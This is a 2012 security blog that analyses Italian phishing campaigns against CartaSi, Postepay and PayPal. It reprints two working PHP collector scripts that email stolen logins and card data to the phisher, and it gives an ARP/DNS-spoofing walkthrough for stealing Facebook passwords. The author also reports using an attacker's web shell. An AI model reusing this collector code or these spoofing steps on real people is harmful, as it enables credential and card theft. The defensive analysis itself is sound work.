Monday, April 23, 2012

CartaSi phishing email part 2/2

Behind these phishing emails, are there several people or just one guy?

What I think is that there is only one guy, because if you check the title of this script you see the text "assembled by ME"; if it were a team it would say "Assembled by XYZ team".


Where is he from?

His mother tongue is Romanian and I think he lives in Italy. As you can see below, there are several files written in Romanian, and the stolen information is sent to a Fastweb email address, which you cannot create if you don't live in Italy.

I was wrong in the previous article when I said that the phisher hacked the website, because it had been defaced by FERID23 from anti-armenia.org. I suppose that at the end of September 2011 this phisher found it, uploaded a shell and created several folders in this order:
  1. d3b (postepay information stealer)
  2. stf (cartasi, uk paypal, banca intesa, it paypal, postepay, VISA)
  3. pastote (cartasi, paypal, VISA, bancopostaclick)

Taking a look at the pastote folder, we see that he uses a mass mailer script to send the phishing emails.


The email addresses are stored in 30 rar files named pastoteXX.


From 2/3/2012 he started targeting PayPal users, but with a different method. I don't have any PayPal phishing email, but from what is on this site I can guess that he sends an email saying you have received a bonus of 100 euro and that, in order to proceed, you must log in to your PayPal account (fake link provided) and fill in the form.

When a victim clicks on the link, he is redirected to this fake page on this site.


Once logged in



Once the form is filled in and the send button clicked, the data is posted to a script called trimite.php, which translated from Romanian means send/forward. This time the data isn't stored in a txt file like before but sent directly to a Fastweb email address, and in the end the victim is redirected to the original site.

$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$data = date("l, F d, Y h:i" ,time());
$agent = $_SERVER['HTTP_USER_AGENT'];
$nome = $_POST['nome'];
$cognome = $_POST['cognome'];
$c_tip = $_POST['credit_card_type'];
$cn = $_POST['cc_number'];
$an = $_POST['expdate_year'];
$luna = $_POST['expdate_month'];
$cvv = $_POST['cvv'];
$dob_ziua = $_POST['dob_ziua'];
$dob_luna = $_POST['dob_luna'];
$dob_an = $_POST['dob_an'];

$address1 = $_POST['adresa'];
$zip = $_POST['cod_postal'];
$city = $_POST['oras'];
$state = $_POST['provincie'];

//---Email---//
$email = "--snip--@fastwebmail.it";
$subiect = "$ip:$username:$password";
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

$mesaj_html ="





Indirizzo email $username
Password PayPal $password

Nome $nome
Gnome $cognome
Data di nascita: $dob_ziua:$dob_luna:$dob_an(ziua:luna:an)

Indirizzo $address1
CAP $zip
Città $city
Provincia $state

Tipo di carta di credito $c_tip
Numero della carta di credito $cn
Data di scadenza $luna/$an
Codice di sicurezza della carta $cvv

IP $ip
Data $data
Browser $agent
";
mail($email, $subiect, $mesaj_html, $headers);
header("Location: http://www.paypal.it");

He did a good job replicating the PayPal login process.

In the stf folder all stolen data is sent to fanemacaz@gmail.com, and the techniques used to trick users are the same as explained previously.

Folder index file.


Folder content.


That's all for now.

Friday, April 20, 2012

Poste Italiane phishing emails 2

In these hours a "new" phishing attack is targeting Poste Italiane and its service called Postepay. In the previous article regarding Poste Italiane phishing emails, the phisher, to convince the victims to send their account details, said that they had won a bonus of 250 euro.

This time he chose another way that is more credible (in my opinion).


The title says that irregular activity was detected on your Poste Italiane account, and the content continues: for your protection you must download the attachment and fill in the form; if you ignore this email your account will be temporarily suspended.

The sender is support@update.com.

When you open the attachment you get this page, with a central form ready to be filled in with Postepay account details (Username, Password, Credit Card Number, Expiration Date, Security Code).


In this file he hasn't tried to obfuscate the form code as he did last time, so the address of the server where the data will be sent is easily visible.


This server is located in Poland and the ISP is Netia S.A.


There are no domains that point to this IP address.


The server is running a copy of Windows Server 2003 with Apache2Triad, which is a sort of WAMP, except that the project has been dead since 2009. If you browse to this address the index page will look like this.


He created an index that doesn't list the other files on the server. As you can imagine, the sobo.php script collects the stolen data, saves it in a txt file or sends an email to the phisher, and at the end redirects the victim to the original site. What will its content be?

Downloaded with wget, so no PHP is executed: the index page.

I was expecting to see a meta tag or nothing; instead I found a copy of the Poste Italiane website. Here is a screenshot posted on PhishTank.

Maybe this means that he started by redirecting the victims to this site and then stealing the information, and now he sends an attachment.

That's all for now.

Thursday, April 19, 2012

ARP/DNS Spoofing Steal Facebook Password (LAN Environment)

In this video I'll show how an attacker can steal user credentials for any site (in this case Facebook) in a LAN environment. First of all we use SET to clone the current Facebook home page and set up a server listening on port 80 with that copy.

The next step is to discover potential victims by mapping our network. There are tons of ways to do this (nmap, hping, the ping command), but this time I used the Linux command arp-scan with the following syntax:


After mapping the network I used a great tool called netcmd to perform an ARP spoofing attack and redirect traffic through the attacker.


The last step is to perform a DNS spoofing attack so that all requests sent by the victim to facebook.com are redirected to the attacker. To do this we need to use ettercap and modify /usr/share/ettercap/etter.dns, adding these two lines.


After launching ettercap we just have to wait for the victim to log in to his Facebook account.
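From the defender's side, the ARP half of this attack shows up as the gateway's IP suddenly being answered by a different MAC; this added example (mine, not the video's or netcmd's code) runs arpwatch-style checks over a constructed list of ARP replies. All addresses and MACs are made-up sample values.

```python
from collections import defaultdict
from typing import NamedTuple


class ArpReply(NamedTuple):
    ts: float   # seconds since capture start
    ip: str     # sender protocol address (the IP the reply claims)
    mac: str    # sender hardware address (who claims it)


class Alert(NamedTuple):
    ts: float
    kind: str   # "changed": IP's MAC differs from the known one; "multi-ip": one MAC claims several IPs
    detail: str


# Constructed sample capture (made-up addresses): a quiet LAN, then at t=3.0 a second
# MAC starts answering for the gateway's IP and for the victim's IP, which is what the
# spoofing described above looks like from a monitoring host on the same segment.
SAMPLE = [
    ArpReply(0.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    ArpReply(1.0, "192.168.1.50", "aa:bb:cc:00:00:50"),
    ArpReply(2.0, "192.168.1.1", "aa:bb:cc:00:00:01"),
    ArpReply(3.0, "192.168.1.1", "aa:bb:cc:00:00:99"),
    ArpReply(3.5, "192.168.1.50", "aa:bb:cc:00:00:99"),
]


def arp_alerts(replies, trusted=None):
    """arpwatch-style detection. `trusted` is an optional ip -> mac table (e.g. the
    gateway, pinned from a known-good moment); other IPs are learned on first sight."""
    known = dict(trusted or {})
    ips_per_mac = defaultdict(set)
    alerts = []
    for r in replies:
        expected = known.setdefault(r.ip, r.mac)
        if expected != r.mac:
            alerts.append(Alert(r.ts, "changed", f"{r.ip}: {expected} -> {r.mac}"))
        ips_per_mac[r.mac].add(r.ip)
        if len(ips_per_mac[r.mac]) > 1:
            # Also legitimate for a router doing proxy ARP, so treat this as corroborating evidence
            alerts.append(Alert(r.ts, "multi-ip", f"{r.mac}: {sorted(ips_per_mac[r.mac])}"))
    return alerts
```

Pinning the gateway in `trusted` (or as a static ARP entry on the host) is what turns the "changed" check from a heuristic into a reliable signal.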



Enjoy the video.

Sunday, April 15, 2012

CartaSi phishing email part 1/2

CartaSi is a credit/charge card that can be used in Italy and abroad.

On the 31st of March I received an email from CartaSi_Informa@cartasi.it.


It is a classic phishing email and it says to download the attachment in order to unlock your account. One strange thing is the two Cyrillic words at the end; maybe this text was translated from Russian/Ukrainian by someone, because there are no mistakes and they forgot the two letters.

Why didn't they check it better before sending?

The missing Italian letters are è and ù, which are accented, so maybe this is an encoding failure by Hotmail or by the software they used to send the email.

By the way, the phishers used a credible domain name (cartasi.it), which is the original one. The attachment to download is named "CartaSi Secure Department" and if you open it with a browser it will look like this:


Here is the original.


Opening the attachment with a text editor we can see where the stolen data will be sent, but this time too the initial FORM tag is encoded.


Once decoded we get this.


Let's analyze the domain with a whois service.

Domain details:
  • Registered: 7 September 2011
  • Expires: 7 September 2012
  • Registrar of record: TUCOWS, INC.
  • Record last update: 23 March 2012
Other details are omitted.

Right now the homepage is a blank page, but I found a cached page taken on the 15th of March by Google's crawlers.


This was a legitimate website running the WordPress CMS, and through one of its plugin flaws the phishers were able to upload a shell. The shell folder has no index file and no .htaccess to prevent directory listing, so here is its content.
As you can see there are several files, but the most important are cartasi.txt and go1.php. The PHP file stores the stolen information in cartasi.txt and maybe does other things.


The pastote folder doesn't have a proper htaccess file either, but it has an index.php file. His mistake was to name the file with an initial uppercase letter, so all files are listed.


The funniest thing is that pollo.php is a c99 shell and abc.php is an "evilc0der v. edition ADVANCED!" shell, both with no password protection, so anyone can use them to download, upload and do other things. I used a shell to download go1.php to see what this script does other than append the stolen information to cartasi.txt and redirect to http://www.bancopostaclik.it/mc_securcode.shtml.

Here is the code.

$username = $_POST['loginx'];
$password = $_POST['passwdx'];
$name     = $_POST['name'];
$ccnumb   = $_POST['ccnumb'];
$month    = $_POST['month'];
$year     = $_POST['year'];
$cvv      = $_POST['cvv2'];
$condice  = $_POST['condice'];
$name     = $_POST['name'];
$email    = $_POST['email'];
$pswmail  = $_POST['pswmail'];
$dsecure  = $_POST['3dsecure'];
$ip        = getenv("REMOTE_ADDR");
$datamasii = date("D M d, Y g:i a");


$message .=".............................................\n";
$message .="Username : $username\n";
$message .="Password : $password\n";
$message .="Full Name: $name\n";
$message .="CCNumber : $ccnumb\n";
$message .="Exp      : $month/$year\n";
$message .="Cvv2     : $cvv\n";
$message .="3D Secure: $dsecure\n";
$message .="CFiscal  : $condice\n";
$message .="Mail     : $email\n";
$message .="Pasw     : $pswmail\n";
$message .="Date     : $datamasii \n";
$message .="..............................................\n";
$message .="©IP $ip\n";

$subject = " CartaSi ";
$file = fopen("cartasi.txt", "a");
fputs ($file, "$message\r\n");
fclose ($file);
mail("--snip--@fastwebmail.it",$subject,$message);

header("Location: http://www.cartasi.it/gtwpages/common/index.jsp?id=HgSgFKmncL");
The other thing it does is send an email to a Fastweb address. Fastweb is an Italian broadband telecommunications company and it provides voice, Internet, cable television and IPTV services. Its email accounts come with a contract, and this means one of two things:
  1. The phisher has hacked a user's email account
  2. It is his own email.
That's it; in the next part I will examine all the other files.

Friday, April 6, 2012

Poste Italiane phishing emails

Poste Italiane is the government-owned postal service of Italy, and spammers use phishing techniques to trick people into sending the credentials of their online accounts and credit cards.

On the first of April I received an email from bancoposta@bpolbpol.com with this content.


Basically it says that I have been selected to get a bonus of 250 euro and, in order to complete the operation, I must download the attachment.

First of all we see that the sender's domain is neither poste.it nor postepay.it, which is rather strange for a legitimate email. I was curious to know what type of site was behind the domain, so I navigated to that URL and got a white screen with blue text saying "website under construction".


Maybe we can get more information by checking through http://whois.domaintools.com who registered that domain.

A few details:
  • Record created: 2/7/2011
  • Record expires: 2/7/2012
  • Registration service provider: Aruba S.p.A.
Other details are omitted because they contain the owner's personal information.

The strange thing about this website is that it has never been linked or added to Google, so no one can find it through a search engine. Since it's not linked I cannot search for a cached page, and consequently I cannot know what type of website was running.

Taking a brief look with nslookup, we discover that it has its own mail server.


Since we cannot know if this site was ever operational, I can say that the SMTP server was used to spread spam without the owner's knowledge.

Now it's time to see what the attachment is. It's a simple HTML file called Document.html, and if you open it with a browser you get a Postepay page with a central form listing different fields, such as username, password, credit card number, expiration date and security code, ready to be filled in.


As you can see it looks very similar to the original; they did a pretty good job.


One thing to notice is that the expiration date year still uses 2011, which means that the HTML page was created last year and they haven't updated it yet.


Where is this information sent?

To find out we open our fake page with an editor like Notepad++; there are two lines, one regarding the copyright and the other one kind of funny, because it tells you that the source code is not available.


If you scroll down to the end of the page you see a few lines of HTML with obfuscated JavaScript.


The code has been converted from ASCII to hexadecimal escapes, and to reverse the process it uses the JavaScript function unescape.

Once decoded, the most important thing to do was to find the "collector site", which must be the value of the action attribute of the form tag.
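A small triage script for attachments like this one and the unobfuscated one in the Poste Italiane post above, added here as an example (it is not code from the phishing kit or from the blog): it peels document.write(unescape("%3C...")) layers the way the browser would and pulls out every form action, flagging those that post outside the brand's own domains. The sample page and the collector.example host are constructed for the demonstration.

```python
import re
from urllib.parse import unquote, urlparse


def js_escape(text: str) -> str:
    """Mimic JavaScript escape() for ASCII text: each char as %XX. Used only to build the sample."""
    return "".join("%%%02X" % ord(c) for c in text)


def js_unescape(s: str) -> str:
    """Python equivalent of JavaScript unescape(): %uXXXX first, then each %XX as one char."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


# Constructed sample attachment: visible input fields plus a tail obfuscated the way
# the post describes. collector.example is a placeholder, not a real collector host.
FORM_HTML = '<form method="POST" action="http://collector.example/soso/system.php">'
SAMPLE_PAGE = (
    "<html><body>\n"
    '<input name="username"><input name="password"><input name="cc_number">\n'
    '<script>document.write(unescape("' + js_escape(FORM_HTML) + '"));</script>\n'
    "</body></html>"
)

UNESCAPE_RE = re.compile(r"""unescape\(\s*["']([^"']*)["']\s*\)""")
ACTION_RE = re.compile(r"""<form[^>]*\baction\s*=\s*["']?([^"'\s>]+)""", re.I)


def deobfuscate(page: str) -> str:
    """Replace each unescape("...") literal with its decoded text, repeating until
    nothing changes so that layered encodings are peeled as well."""
    while True:
        new = UNESCAPE_RE.sub(lambda m: js_unescape(m.group(1)), page)
        if new == page:
            return page
        page = new


def form_actions(page: str) -> list:
    """All form action URLs in the page once the obfuscated parts are decoded."""
    return ACTION_RE.findall(deobfuscate(page))


def suspicious_actions(page: str, brand_domains: set) -> list:
    """Actions whose host is not one of the brand's domains (relative/hostless URLs count too)."""
    flagged = []
    for url in form_actions(page):
        host = (urlparse(url).hostname or "").lower()
        if not any(host == d or host.endswith("." + d) for d in brand_domains):
            flagged.append(url)
    return flagged
```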


The downloaded page will perform a POST request to gogeamitu.com/soso/system.php with all the sensitive information. This PHP script can act in several ways, but I think it does one of these things:
  • Stores the information in a database on the same server
  • Sends the information to a remote database or to another web page
  • Sends an email to the spammers with all the information

To know whether this site has been compromised or is the spammer's own server, we take a look at the domain through a whois service (as before).

Domain details:
  • Record created: 21 February 2012
  • Record expires: 21 February 2013
  • Registration service provider: Aruba S.p.A.
Again some details are omitted, and in this case too the owner's details are fully visible. This domain was registered only one month ago, but this time it is linked, so I can check the web cache of various search engines.

Current home page.


I found the cached page only on Google, and it was taken on the 28th of March; this is too far from the registration date to say that it has never been changed. Another interesting thing is the domain name gogeamitu, which is the name of an old Romanian boxer, Gogea Mitu; maybe this is a clue about the spammer's nationality?

The visible content of system.php is shown below; it is composed of only one line, which redirects the victim to poste.it.


In my opinion the spammers have paid one person to use his personal information to register gogeamitu and store (*) all the victims' details on this server; maybe once a day they retrieve the data and clean the db.

* After doing further research on other phishing emails: he (I'm quite sure it is only one person) doesn't store the information in the db, but sends an email to his personal address.